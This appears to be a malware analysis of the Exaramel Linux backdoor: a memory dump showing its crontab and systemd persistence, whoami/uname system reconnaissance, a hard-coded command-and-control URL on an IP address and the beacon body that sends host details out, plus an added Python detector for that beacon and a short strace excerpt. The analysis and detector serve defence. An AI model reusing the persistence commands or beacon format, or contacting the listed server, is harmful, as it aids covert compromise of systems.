- 0xc42000ee98 0411412.413414415416417.418422423424426.428429431451500.501502503504505.506507508510511.
- 0xc42000eef0 $.m.............j6n.....&.........m..............!n..............bn.....4.........m.....
- 0xc42000ef48 ......../test/`........ E. ..../tmp/.applock............................................
- 0xc42000efa0 rH..*.E?.[......&.............../dev/urandom............@.. ............................
- 0xc42000eff8 ................................Hosts...................Proxy...................Version.
- 0xc42000f050 ................Guid....................Next....................Datetime................
- 0xc42000f0a8 Timeout.................Def.............................................................
- :
- 0xc42000f408 /bin/sh................./bin/sh.-c......SHELL=/bin/bash.TERM=vt100......HUSHLOGIN=FALSE.
- 0xc42000f460 USER=nyan_apt....SHLVL=1.........HOME=/test.LOGNAME=test......._=./Exaramel...1.m.......
- 0xc42000f4b8 ........`.......... ....`.......... ..../dev/null.......... ....... ....................
- 0xc42000f510 /bin/sh./bin/sh.-c.whoami.......SHELL=/bin/bash.TERM=vt100......HUSHLOGIN=FALSE.USER=nyan
- 0xc42000f568 _apt.....SHLVL=1.mung....HOME=/test..LOGNAME=test...._=./Exaramel........test../bin/uname
- 0xc42000f5c0 `.m............./usr/bin/uname../usr/bin/uname../bin/uname......`.......... ....`.......
- 0xc42000f618 ... ..../dev/null.......... ....... ............uname.................../bin/uname......
- 0xc42000f670 -a.TERM=vt100...SHELL=/bin/bash.HUSHLOGIN=FALSE.USER=test....SHLVL=1.nyan_apt%0A.HOME=/te
- 0xc42000f6c8 st.LOGNAME=test...._=./Exaramel..........`.....@.. ....... ....$.......... .............
- 0xc42000f720 P.. ....I.........m...............m...........nyan_apt%0A...............................
- :
- 0xc42004a36f .*/1 * * * * /test/Exaramel.@reboot /test/Exaramel.true.................................
- 0xc42004a4cf ..`. ............................................Linux xxxxxxxxxxxxxxxxxxxxxxxxxx #1 SMP
- 0xc42004a527 xxxxxxxxxxxxxxxxxxxxxx GNU/Linux.......................................................
- 0xc42004c660 (crontab -l 2>/dev/null) | grep //test/Exaramel && echo 'true' || echo 'false'.........
- :
- 0xc420053148 ........................................................................................
- 0xc4200531a0 /etc/systemd/system/syslogd.service.....................................................
- 0xc4200531f8 ........................................................................................
- :
- 0xc4200533d3 ........................................................................................
- 0xc42005342b .....................https://176.31.225.204/api/v1/auth/app.............................
- 0xc420053483 .............................q`........ ...............................................
- :
- 0xc4200551e0 generation=1&guid=7248d60f-2a8f-453f-ac5b-19f5e0d7a3b0&platform=Linux+xxxxxxxxxxxxxxxxx
- 0xc420055238 xxxxxxx+%231+SMP+xxxxxxxxxxxxxx+x86_64+GNU%2FLinux%0A&version=1&whoami=nyan_apt%0A.....
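A matcher for that beacon body, as an added example (not code from the original paste): it checks a request body against the hardcoded template `generation=%d&guid=%s&platform=%s&version=%d&whoami=%s%0A` from the static analysis section, field set and order included. The sample bodies are constructed, with the hostname in the captured one replaced by HOST.

```python
# Added example (not from the original paste): recognise Exaramel callback
# bodies by the hardcoded template, e.g. in decrypted proxy or web-server logs.
import re
from urllib.parse import parse_qsl

TEMPLATE_FIELDS = ["generation", "guid", "platform", "version", "whoami"]
UUID_RE = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$")

# Constructed sample bodies: the first is shaped like the beacon captured above
# (hostname replaced by HOST), the second is an ordinary form post for contrast.
SAMPLE_BODIES = [
    "generation=1&guid=7248d60f-2a8f-453f-ac5b-19f5e0d7a3b0"
    "&platform=Linux+HOST+%231+SMP+x86_64+GNU%2FLinux%0A"
    "&version=1&whoami=nyan_apt%0A",
    "username=alice&password=hunter2&generation=1",
]


def parse_beacon(body):
    """Return the decoded fields if `body` matches the template, else None."""
    pairs = parse_qsl(body, keep_blank_values=True)
    if [k for k, _ in pairs] != TEMPLATE_FIELDS:   # exact field set and order
        return None
    rec = dict(pairs)
    # The template ends with a literal %0A after whoami, and platform carries the
    # URL-encoded `uname -a` output with its newline, so both decode to "...\n".
    if not (rec["whoami"].endswith("\n") and rec["platform"].endswith("\n")):
        return None
    if not (rec["generation"].isdigit() and rec["version"].isdigit()):
        return None
    if not UUID_RE.match(rec["guid"]):
        return None
    return {k: v.rstrip("\n") for k, v in rec.items()}


def scan_bodies(bodies):
    """Run parse_beacon over many bodies and keep only the matches."""
    return [rec for rec in map(parse_beacon, bodies) if rec is not None]


if __name__ == "__main__":
    for hit in scan_bodies(SAMPLE_BODIES):
        print("Exaramel beacon: guid=%(guid)s whoami=%(whoami)s" % hit)
```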
- // crontab tampering artifact
- munmap(0x7f75952fb000, 4096) = 0
- socket(PF_FILE, SOCK_DGRAM|SOCK_CLOEXEC, 0) = 3
- connect(3, {sa_family=AF_FILE, path="/dev/log"}, 110) = 0
- sendto(3, "<78>Jan 10 07:55:51 crontab[2547]: (test) LIST (test)", 53, MSG_NOSIGNAL, NULL, 0) = 53
- ---
- # MalwareMustDie! - Don't spread malware - spread LOVE! @unixfreaxjp